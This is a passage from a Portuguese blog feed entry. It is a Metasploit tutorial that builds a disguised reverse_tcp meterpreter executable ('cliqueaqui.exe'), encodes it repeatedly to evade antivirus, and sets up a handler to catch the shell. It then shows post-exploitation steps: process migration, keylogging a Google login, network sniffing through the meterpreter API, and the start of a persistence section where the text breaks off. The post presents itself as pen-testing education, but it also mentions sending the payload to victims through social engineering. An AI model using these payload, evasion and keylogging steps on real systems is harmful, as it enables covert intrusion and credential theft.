(espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fzuc26ZLs28/S41zzSjTSLI/AAAAAAAAAIU/m2bh0UBJ8dQ/s72-c/winhlp32start.png' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-9203653420974986851</id><published>2010-02-21T09:28:00.036-03:00</published><updated>2010-03-01T13:11:51.078-03:00</updated><title type='text'>Metasploit Exploitation</title><content type='html'>Metasploit¹ é uma ferramenta utilizada, em sua maior parte, por Pen Testers², para a realização de testes de penetração (penetration test), podendo ser usada pelas mais variadas áreas, para fins de testes, análises, conhecimento, etc. Este artigo visa demonstrar algumas formas de uso para a pós-exploração de um alvo, usando o framework Metasploit, este que se encontra em sua versão 3.3.4-dev.&lt;br /&gt;&lt;br /&gt;Recomendo, para este artigo um conhecimento prévio sobre o framework, linha de comando em Linux³, redes de computadores⁴, TCP/IP⁵, etc!&lt;br /&gt;&lt;br /&gt;O cenário utilizado para a criação deste artigo é mostrado na figura a baixo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4EokIikRFI/AAAAAAAAAEU/fiprH94zicE/s1600-h/topologia2.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440674426073138258" style="margin: 0px auto 10px; display: block; width: 320px; height: 178px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4EokIikRFI/AAAAAAAAAEU/fiprH94zicE/s320/topologia2.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;Descrição:&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Attacker&lt;/strong&gt; = De onde partiram os ataques.&lt;br /&gt;&lt;strong&gt;Roteador1&lt;/strong&gt; = Roteador da rede local do atacante.&lt;br /&gt;&lt;strong&gt;XX.XX.XX.XX&lt;/strong&gt; = IP WAN&lt;br /&gt;&lt;strong&gt;YY.YY.YY.YY&lt;/strong&gt; = IP WAN&lt;br /&gt;&lt;strong&gt;Roteador2&lt;/strong&gt; = Roteador da rede local do alvo.&lt;br /&gt;&lt;strong&gt;10.0.0.0/8&lt;/strong&gt; = Classe utilizada na rede interna do alvo.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Obs.:&lt;/span&gt; Ficar atento ao redirecionamento das portas no roteador para a máquina atacante.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Nota:&lt;/span&gt; Em seus testes, não há a necessidade de utilizar as mesmas classes de IPs, quantidades de máquinas utilizadas neste exemplo, fica a seu critério a alteração dos mesmos.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Dica:&lt;/span&gt; Com 2 máquinas reais e softwares de virtualização⁶ instalada em ambos, você conseguirá montar o cenário acima proposto.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Começando:&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Assumirei que você já tenha estabelecido uma sessão meterpreter com pelo 1 máquina na rede alvo.&lt;br /&gt;&lt;br /&gt;Ah, ainda não? E não sabe como fazer?Ok! Sem problemas, irei demonstrar uma simples técnica apenas para ganharmos a sessão meterpreter e assim podermos continuar com nosso artigo.&lt;br /&gt;&lt;br /&gt;Entre no diretório do MSF com o seguinte comando:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;root@bt:~# cd /pentest/exploits/framework3/&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Ok! Antes de continuarmos, é sempre bom mantermos o metasploit atualizado, sendo assim, como já estamos no diretório do msf, basta o comando svn update para atualizarmos o MSF.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;root@bt:/pentest/exploits/framework3# svn update&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;Com o msf atualizado, iremos criar o payload que enviaremos para o nosso alvo.&lt;br /&gt;Prosseguimos com o seguinte comando:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;root@bt:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4455 X &gt; cliqueaqui.exe&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;Será criado no diretório corrente o arquivo executável “cliqueaqui.exe”, agora basta enviar para o alvo e aguardá-lo clicar para execução, certo?&lt;br /&gt;&lt;br /&gt;NÃO, não está certo! E os anti-virus? Com este simples payload que criamos, o AV, detectará assim que ele por os “pés” no alvo!&lt;br /&gt;&lt;br /&gt;Se enviarmos o arquivo criado acima “cliqueaqui.exe” para uma analise online com vários AVs, veremos que muitos o detectam.&lt;br /&gt;Utilizei o site Virus Total⁸ para a verificação online do arquivo, veja a imagem abaixo que dos 40 AVs existentes no site, apenas 13 identificam o nosso arquivo “cliqueaqui.exe”.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EowlkZd1I/AAAAAAAAAEc/I_9uIR-5iyI/s1600-h/virustotal.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440674640023877458" style="margin: 0px auto 10px; display: block; width: 320px; height: 295px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EowlkZd1I/AAAAAAAAAEc/I_9uIR-5iyI/s320/virustotal.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Veja também no site Verificador de Malware Jotti⁹, neste, dos 20 scanners, 7 detectam o arquivo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Eo6dlPCbI/AAAAAAAAAEk/6zwSlcXL-Bc/s1600-h/virusscanjotti.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440674809678596530" style="margin: 0px auto 10px; display: block; width: 320px; height: 181px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Eo6dlPCbI/AAAAAAAAAEk/6zwSlcXL-Bc/s320/virusscanjotti.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Sendo assim, vamos “tunar” nosso arquivo cliqueaqui.exe. Digite o seguinte comando:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;root@bt:/pentest/exploits/framework3# msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4455 R | msfencode -c 15 -e x86/shikata_ga_nai -a x86 -t raw | msfencode -c 5 -a x86 -e x86/alpha_mixed -t raw | msfencode -c 3 -e x86/call4_dword_xor -t exe &gt; cliqueaqui2.exe&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Obs.:&lt;/span&gt; Troquem XX.XX.XX.XX pelo IP WAN do seu roteador!&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Obs.:&lt;/span&gt; Lembrando que o comando acima &lt;span style="color: rgb(255, 0, 0);"&gt;não&lt;/span&gt; é a melhor prática para burlar AV!&lt;br /&gt;&lt;br /&gt;Pronto, agora podemos ver que já diminuímos a quantidade de AVs que estavam detectando nosso arquivo, como pode ser visto na figura abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EpGKYND3I/AAAAAAAAAEs/iDcl3JRqR1s/s1600-h/virustotal1.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440675010682097522" style="margin: 0px auto 10px; display: block; width: 320px; height: 264px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EpGKYND3I/AAAAAAAAAEs/iDcl3JRqR1s/s320/virustotal1.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Concluído a criação do nosso payload, agora vamos para a próxima fase.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Nota:&lt;/span&gt; Não entrarei em detalhes nas opções usadas acima a princípio, assim que possível explicarei os opções novamente com outro artigo mais detalhado neste quesito.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Dica:&lt;/span&gt; Aqui foi usado um simples payload reverso para conseguirmos estabelecer a sessão meterpreter. Mais poderiam ser utilizados outras técnicas, como, envio de arquivo pdf com código malicioso, uma imagem jpeg, um arquivo doc, usando engenharia social fazendo com que a vitima execute outros arquivos, etc.. Fica para um próximo artigo.&lt;br /&gt;&lt;br /&gt;USEM A IMAGINAÇÃO.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Dica:&lt;/span&gt; Gaste algum tempo na leitura das opções dos comandos usados acima.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;# ./msfpayload –h&lt;br /&gt;# ./msfencode –h&lt;br /&gt;# ./msfencode –l&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Obs.:&lt;/span&gt; Vou considerar que vocês criaram um ambiente virtual para os testes, sendo assim, não há a necessidade de aprofundar (não agora!) em criação de payloads e tal, na máquina virtual, vocês podem desabilitar o AV e executar o primeiro payload que criamos, assim, será criada a sessão entre o atacante e o alvo normalmente.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Console Metasploit:&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;Agora que criamos nosso arquivo “cliqueaqui2.exe” e enviamos ao alvo, precisamos deixar nosso msf “escutando” as conexões, esperando a execução do nosso arquivo no alvo.&lt;br /&gt;Para isso, de os seguintes comandos no console do metasploit:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;msf &gt; use exploit/multi/handler&lt;br /&gt;msf &gt; set PAYLOAD Windows/meterpreter/reverse_tcp&lt;br /&gt;msf &gt; set LHOST 192.168.0.110&lt;br /&gt;msf &gt; set LPORT 4455&lt;br /&gt;msf &gt; exploit&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Veja os comandos na imagem abaixo:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EpXNC3lnI/AAAAAAAAAE0/zGxDGXspJlY/s1600-h/multihandler.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440675303455692402" style="margin: 0px auto 10px; display: block; width: 320px; height: 305px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EpXNC3lnI/AAAAAAAAAE0/zGxDGXspJlY/s320/multihandler.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Ao ser executado o nosso arquivo no computador da vitima, será estabelecida uma conexão entre o Atacante e o alvo. Assim, ganhamos nossa Shell meterpreter.&lt;br /&gt;Veja imagem abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EpmUzdmII/AAAAAAAAAE8/V6XWrHUpkzg/s1600-h/conexaoestabelecida.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440675563236595842" style="margin: 0px auto 10px; display: block; width: 320px; height: 243px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EpmUzdmII/AAAAAAAAAE8/V6XWrHUpkzg/s320/conexaoestabelecida.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Aparentemente parece que está travado, mais não está! Repare que a sessão meterpreter já foi criada, sendo assim, pressionamos Ctrl+C para finalizar este “travamento”.&lt;br /&gt;Agora digite o comando sessions –l, como abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4Eptwv_mJI/AAAAAAAAAFE/mha9OjhtANY/s1600-h/conexaoestabelecida2.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440675690997323922" style="margin: 0px auto 10px; display: block; width: 320px; height: 161px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4Eptwv_mJI/AAAAAAAAAFE/mha9OjhtANY/s320/conexaoestabelecida2.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Temos uma sessão ativa com ID de número 1 identificando-a.&lt;br /&gt;Veja que aparentemente conectamos do IP da nossa máquina local (192.168.0.110) com o IP WAN do roteador2 (YY.YY.YY.YY).&lt;br /&gt;&lt;br /&gt;Agora vamos interagir com o console meterpreter, basta o comando sessions –i 1 como mostrado abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4Ep9kw5PAI/AAAAAAAAAFM/bxVhjPgRpYg/s1600-h/meterpretershell.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440675962657782786" style="margin: 0px auto 10px; display: block; width: 306px; height: 71px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4Ep9kw5PAI/AAAAAAAAAFM/bxVhjPgRpYg/s320/meterpretershell.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Yes! Agora sim, vamos começar o artigo! :)&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Meterpreter&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;O meterpreter supera as limitações e fornece várias APIs que permite ao atacante executar diversos ataques de exploração no Shell meterpreter, podendo ir mais a fundo e descobrindo o máximo possível de informações do alvo e da rede interna. Meterpreter proporciona uma enorme flexibilidade para o processo de pós-exploração, deixando-o até escrever seus próprios scripts meterpreter.&lt;br /&gt;&lt;br /&gt;Bom, chega de bla bla bla!!!&lt;br /&gt;&lt;br /&gt;Como estamos executando em cima do processo “cliqueaqui2.exe”, precisamos migrar para um processo mais estável, onde um usuário dificilmente irá ver onde estamos!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4EqJaujtlI/AAAAAAAAAFU/CNwoEPy-1eo/s1600-h/processocliqueaqui.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440676166122059346" style="margin: 0px auto 10px; display: block; width: 286px; height: 320px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4EqJaujtlI/AAAAAAAAAFU/CNwoEPy-1eo/s320/processocliqueaqui.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Agora vejamos no console meterpreter o processo que estamos com o comando getpid, seguido do comando ps.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EqT0yX1HI/AAAAAAAAAFc/q3gOjFghJEM/s1600-h/getpideps.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440676344916071538" style="margin: 0px auto 10px; display: block; width: 320px; height: 190px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EqT0yX1HI/AAAAAAAAAFc/q3gOjFghJEM/s320/getpideps.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Agora vamos migrar para o processo explorer.exe com o comando migrate. Repare na imagem acima o PID do processo explorer.exe.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EqfNkFf5I/AAAAAAAAAFk/0901SG14cHU/s1600-h/migrate472.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440676540545597330" style="margin: 0px auto 10px; display: block; width: 313px; height: 73px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EqfNkFf5I/AAAAAAAAAFk/0901SG14cHU/s320/migrate472.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Ok! Deseja ver a versão do Windows que você está atacando?&lt;br /&gt;Simples, dê o comando sysinfo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4Eqo4esJKI/AAAAAAAAAFs/JOmybn1f7qk/s1600-h/sysinfo.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440676706684511394" style="margin: 0px auto 10px; display: block; width: 320px; height: 83px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4Eqo4esJKI/AAAAAAAAAFs/JOmybn1f7qk/s320/sysinfo.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Agora vejamos o IP da máquina que estamos executando com o comando ipconfig.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Eqy9vJgSI/AAAAAAAAAF0/XxegSpcej1A/s1600-h/comandoipconfig.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440676879894413602" style="margin: 0px auto 10px; display: block; width: 320px; height: 148px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Eqy9vJgSI/AAAAAAAAAF0/XxegSpcej1A/s320/comandoipconfig.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Comandos simples até agora, se quiser ver os comandos disponíveis para uso no console meterpreter, basta executar o comando help ou simplesmente ?.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4Eq-KMVctI/AAAAAAAAAF8/nn8sWM_tlZk/s1600-h/HELP1.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440677072216617682" style="margin: 0px auto 10px; display: block; width: 210px; height: 320px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4Eq-KMVctI/AAAAAAAAAF8/nn8sWM_tlZk/s320/HELP1.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Avançando com Meterpreter.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Agora vamos usar o keylogging¹⁰ e vamos tentar capturar o máximo das teclas digitadas pelo usuário. Está é uma técnica demorada para retorno de informações e consome muito tempo, eu aconselho usa-lá após ter retirado o máximo de informações do alvo e também depois da instalação de algum backdoor¹¹, para que assim, caso o usuário desligue ou reinice a máquina, consigamos voltar a acessá-la posteriormente.&lt;br /&gt;Com o comando keyscan_start, iniciamos o nosso keylogger, agora só esperar um tempo e ver os resultados.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4ErP1o4OkI/AAAAAAAAAGE/2l3uVe-rxgw/s1600-h/keyscan_start.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440677375936838210" style="margin: 0px auto 10px; display: block; width: 282px; height: 57px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4ErP1o4OkI/AAAAAAAAAGE/2l3uVe-rxgw/s320/keyscan_start.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Na imagem abaixo estou tentado fazer login nos serviços do Google.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4ErdEaBqxI/AAAAAAAAAGM/cGsMNHFxfWo/s1600-h/contagoogle.PNG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440677603239373586" style="margin: 0px auto 10px; display: block; width: 320px; height: 206px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4ErdEaBqxI/AAAAAAAAAGM/cGsMNHFxfWo/s320/contagoogle.PNG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Agora vamos ver o que nosso keylogger pegou com o comando keyscan_dump e logo em seguida finalizo o mesmo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4ErprBAEkI/AAAAAAAAAGU/1EnA-ZjzJJ0/s1600-h/keyscan_dumpstop.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440677819761824322" style="margin: 0px auto 10px; display: block; width: 292px; height: 108px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4ErprBAEkI/AAAAAAAAAGU/1EnA-ZjzJJ0/s320/keyscan_dumpstop.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Repare na imagem acima, que foi capturado o meu e-mail (meulogin) e minha senha (minhasenha).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Sniffing com Meterpreter.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Vamos sniffar o que passa pela nossa interface do alvo e ver o que conseguimos pegar de interessante.&lt;br /&gt;Primeiramente, precisamos carregar o módulo sniffer¹² com o comando use sniffer, em seguida, pedimos para listar as interfaces de rede com o comando sniffer_interfaces. Iremos iniciar nosso sniffer nesta interface indicada pelo numero 1, com o comando sniffer_start 1, podemos esperar o tempo que você achar conveniente. Já foi tomar uma água? Uma cerveja? Tomou banho? Não? Ok! Não faz mal, vou salvar o que ele farejou até agora em um arquivo com extensão .cap, com o nome de sniffer, com o comando sniffer_dump 1 /tmp/sniffer.cap, para eu poder analisá-lo com outra ferramenta mais intuitiva, e logo após, encerro o sniffing.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EsCoV4x4I/AAAAAAAAAGc/RRDg-cWOzRw/s1600-h/usesniffer.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440678248540850050" style="margin: 0px auto 10px; display: block; width: 320px; height: 141px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_fzuc26ZLs28/S4EsCoV4x4I/AAAAAAAAAGc/RRDg-cWOzRw/s320/usesniffer.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Vejamos algumas informações sobre o arquivo sniffer.cap usando o capinfos.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EsNdzSgpI/AAAAAAAAAGk/6lwTLm6SxEA/s1600-h/capinfos.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440678434689942162" style="margin: 0px auto 10px; display: block; width: 320px; height: 219px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EsNdzSgpI/AAAAAAAAAGk/6lwTLm6SxEA/s320/capinfos.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Vamos analisar o arquivo sniffer.cap com a ferramenta Wireshark¹³.&lt;br /&gt;Basta abrir o Wireshark e ir em File &gt; Open e apontar para o arquivo sniffer.cap.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4EsYtIWwyI/AAAAAAAAAGs/g4cNXOwxHSc/s1600-h/wireshark1.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440678627783394082" style="margin: 0px auto 10px; display: block; width: 294px; height: 314px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4EsYtIWwyI/AAAAAAAAAGs/g4cNXOwxHSc/s320/wireshark1.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Agora veja a interface do Wireshark já com o arquivo sniffer.cap carregado. E as senhas em plaint-text heim? Perigooo!!! :&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EslWzocdI/AAAAAAAAAG0/PWP-wnkoyvs/s1600-h/wireshark2.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440678845129191890" style="margin: 0px auto 10px; display: block; width: 320px; height: 200px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EslWzocdI/AAAAAAAAAG0/PWP-wnkoyvs/s320/wireshark2.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Ah! Você não gosta do Wireshark ou não quer usá-lo agora? Prefere o tcpdump?&lt;br /&gt;No problem! Vamos analisar o arquivo sniffer.cap com o tcpdump¹⁴ então, oras!!!&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;root@bt:~# tcpdump –n –r sniffer.cap&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Se quiser ver as primeiras 10 linhas do arquivo, basta adicionar head –n 10 na frente do comando acima.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;root@bt:~# tcpdump –n –r sniffer.cap head –n 10&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Vamos continuar com o sniffer, só que agora executando com o modo interativo do ruby¹⁵, basta executar o comando irb e voilà!!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Es0iHaqCI/AAAAAAAAAG8/jQaXZHt_8Iw/s1600-h/irb.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440679105863002146" style="margin: 0px auto 10px; display: block; width: 320px; height: 62px; text-align: center;" alt="" src="http://4.bp.blogspot.com/_fzuc26ZLs28/S4Es0iHaqCI/AAAAAAAAAG8/jQaXZHt_8Iw/s320/irb.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Seria interessante, para uma melhor compreensão, ter noções básicas da linguagem ruby.&lt;br /&gt;Como o modo interativo está “doido” para trabalhar, vamos lá.&lt;br /&gt;Um pouco acima, quando executamos o comando use sniffer, por trás dos panos (ou cortinas!), estava executando a seguinte chamada API, client.core.use(“sniffer”) e quando executamos o comando sniffer_interfaces, estavamos invocando (Sai capeta!) a chamada API, client.sniffer.interfaces().&lt;br /&gt;Veja e compare as saídas abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EtCs7ZWXI/AAAAAAAAAHE/h4GDKUEq3f0/s1600-h/saidairb.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440679349283543410" style="margin: 0px auto 10px; display: block; width: 320px; height: 58px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EtCs7ZWXI/AAAAAAAAAHE/h4GDKUEq3f0/s320/saidairb.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Olhe a imagem acima e repare que ao passar para o irb a chamada client.core.use(“sniffer”), ele nos retorna true, nos confirmando que foi carregado com êxito. E quando passamos a chamada client.sniffer.interfaces(), nos retorna informações sobre a nossa interface, repare as saídas de ambas as saídas.&lt;br /&gt;&lt;br /&gt;E a chamada para iniciarmos o sniffing? Cadê? Calma, está aqui! A chamada API é client.sniffer.capture_start(intf, maxp), vemos que a chamada aceita dois valores, intf é a identificação da interface, repare na imagem acima que conseguimos saber este valor executando a chamada client.sniffer.interfaces(), onde pegamos o valor de “idx”. E o valor de maxp, é a quantidade máxima de pacotes que iremos armazenar no buffer. Ambos deverão ser valores inteiros. Logo em seguida com a chamada client.sniffer.capture_stats(1), vemos o quanto já conseguimos snifar até o momento!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EtMew2SCI/AAAAAAAAAHM/hjeKYxGjR5Q/s1600-h/irbstartstats.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440679517279897634" style="margin: 0px auto 10px; display: block; width: 320px; height: 46px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_fzuc26ZLs28/S4EtMew2SCI/AAAAAAAAAHM/hjeKYxGjR5Q/s320/irbstartstats.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hora de analisar o que farejamos não? Ohh Yes!! Lembra quando executamos o comando sniffer_dump? Pois é, agora vamos executar a sua chamada API que é identificada por client.sniffer.capture_dump(intf), nesta chamada obtemos do buffer as informações e já apagando-a, par ler os dados precisamos invocar o espírito do... Ops! Me empolguei! Como dizia, precisamos da chamada client.sniffer.capture_dump_read(intf,1024*512).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EtZShkt_I/AAAAAAAAAHU/EiGP8O1ASr4/s1600-h/capturedump1.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440679737332905970" style="margin: 0px auto 10px; display: block; width: 320px; height: 135px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EtZShkt_I/AAAAAAAAAHU/EiGP8O1ASr4/s320/capturedump1.png" border="0" /&gt;&lt;/a&gt; Ok, já vimos como funciona mais ou menos internamente, agora podemos parar nosso sniffing com a chamada client.sniffer.capture_stop(1), passando a identificação do nossa interface, que equivale ao comando sniffer_stop 1.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EtmeasvOI/AAAAAAAAAHc/EZ_djp1sZnI/s1600-h/capture_stop.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5440679963863596258" style="margin: 0px auto 10px; display: block; width: 320px; height: 35px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_fzuc26ZLs28/S4EtmeasvOI/AAAAAAAAAHc/EZ_djp1sZnI/s320/capture_stop.png" border="0" /&gt;&lt;/a&gt; Poxa! Vamos parar de “cheirar” agora (Isto me lembra um jogador famoso, deixa pra lá!).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Mantendo o Acesso.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Pois bem, até aqui está indo as mil maravilhas certo?&lt;br /&gt;Não! Está indo mais ou menos, e se a pessoa reiniciar ou até mesmo desligar a máquina destino? Bom, vamos querer continuar com acesso a ela, para que posteriormente possamos obter mais informações ainda. Para isso, existe um script meterpreter que nos ajudará fazer o que queremos, seu nome é persistence! 